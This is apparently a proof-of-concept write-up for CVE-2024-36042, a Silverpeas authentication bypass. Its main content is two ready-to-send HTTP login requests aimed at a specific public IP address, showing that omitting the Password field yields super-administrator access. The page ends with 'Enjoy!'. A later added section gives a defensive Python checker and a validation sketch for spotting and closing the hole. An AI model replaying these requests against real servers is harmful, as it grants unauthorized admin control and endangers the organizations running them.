
CVE-2024-36042 PoC: Silverpeas security vulnerability

Related vulnerability
Title: Silverpeas security vulnerability (CVE-2024-36042)
Description: Silverpeas is an open-source business collaboration platform that bundles applications such as project management, blogs, forums and document management. Silverpeas versions before 6.3.5 contain a security vulnerability: authentication can be bypassed through the Password field of AuthenticationServlet, granting unauthenticated users super administrator access.
Description
CVE-2024-36042 Silverpeas authentication bypass vulnerability #Silverpeas #vulnerability #authentication 
Introduction
# CVE-2024-36042

## First, identify whether the target version is vulnerable
All versions prior to 6.3.5 are vulnerable (i.e., version 6.3.4 and earlier). If the sender omits the Password form field, the application signs you in as the specified user without any challenge.

## The standard login request looks like this in Burp Suite:
```http
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 49
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded

Login=SilverAdmin&Password=SilverAdmin&DomainId=0
```

This login fails (unless the default password was never changed) and you are redirected back to the login page with an error code.

## But if you remove the Password field:
```http
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 28
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded

Login=SilverAdmin&DomainId=0
```

The login attempt then (usually) succeeds and redirects you to the main page, now logged in as super admin.

![Evidence screenshot](https://github.com/zaaraZiof0/CVE-2024-36042/blob/main/evidance.png)

The bug works with any valid user, but SilverAdmin is the default super admin account.
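For defenders, the distinguishing feature of this bypass is a login POST that carries `Login` but no `Password` field. The checker below is an added example (not part of the original PoC or of Silverpeas) that flags such requests in captured traffic, such as reverse-proxy or WAF logs that retain POST bodies, and shows the server-side validation that closes the hole; the host name and request bodies are constructed samples mirroring the two requests above.

```python
"""Flag Silverpeas login requests that omit the Password form field (CVE-2024-36042)."""
from urllib.parse import parse_qs

LOGIN_PATH = "/silverpeas/AuthenticationServlet"


def parse_request(raw: str) -> tuple[str, str, dict[str, list[str]]]:
    """Split a raw HTTP request into (method, path, form fields)."""
    head, _, body = raw.partition("\n\n")
    method, path, _ = head.splitlines()[0].split(" ", 2)
    return method, path, parse_qs(body.strip(), keep_blank_values=True)


def is_bypass_attempt(raw: str) -> bool:
    """True for a POST to the login servlet whose form has Login but an absent
    or empty Password field (absent is the case the PoC relies on; empty is
    flagged as well, since a legitimate login form always submits a value)."""
    method, path, form = parse_request(raw)
    if method != "POST" or path != LOGIN_PATH:
        return False
    return "Login" in form and not form.get("Password", [""])[0]


def validate_login_form(form: dict[str, list[str]]) -> bool:
    """Server-side check a login handler should enforce: refuse any request
    whose Login or Password field is missing or empty, rather than falling
    through to a success path. Hypothetical check, not Silverpeas's own code."""
    return bool(form.get("Login", [""])[0]) and bool(form.get("Password", [""])[0])


# Constructed samples (placeholder host) mirroring the two requests shown above.
NORMAL_LOGIN = (
    "POST /silverpeas/AuthenticationServlet HTTP/2\n"
    "Host: silverpeas.example.internal\n"
    "Content-Type: application/x-www-form-urlencoded\n\n"
    "Login=SilverAdmin&Password=SilverAdmin&DomainId=0\n"
)
MISSING_PASSWORD = (
    "POST /silverpeas/AuthenticationServlet HTTP/2\n"
    "Host: silverpeas.example.internal\n"
    "Content-Type: application/x-www-form-urlencoded\n\n"
    "Login=SilverAdmin&DomainId=0\n"
)

if __name__ == "__main__":
    for name, req in (("normal", NORMAL_LOGIN), ("no-password", MISSING_PASSWORD)):
        form = parse_request(req)[2]
        print(f"{name}: bypass={is_bypass_attempt(req)} valid={validate_login_form(form)}")
```

Run over a batch of captured requests, `is_bypass_attempt` gives an alerting signal; `validate_login_form` is the shape of the fix an application-side check needs.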

Enjoy!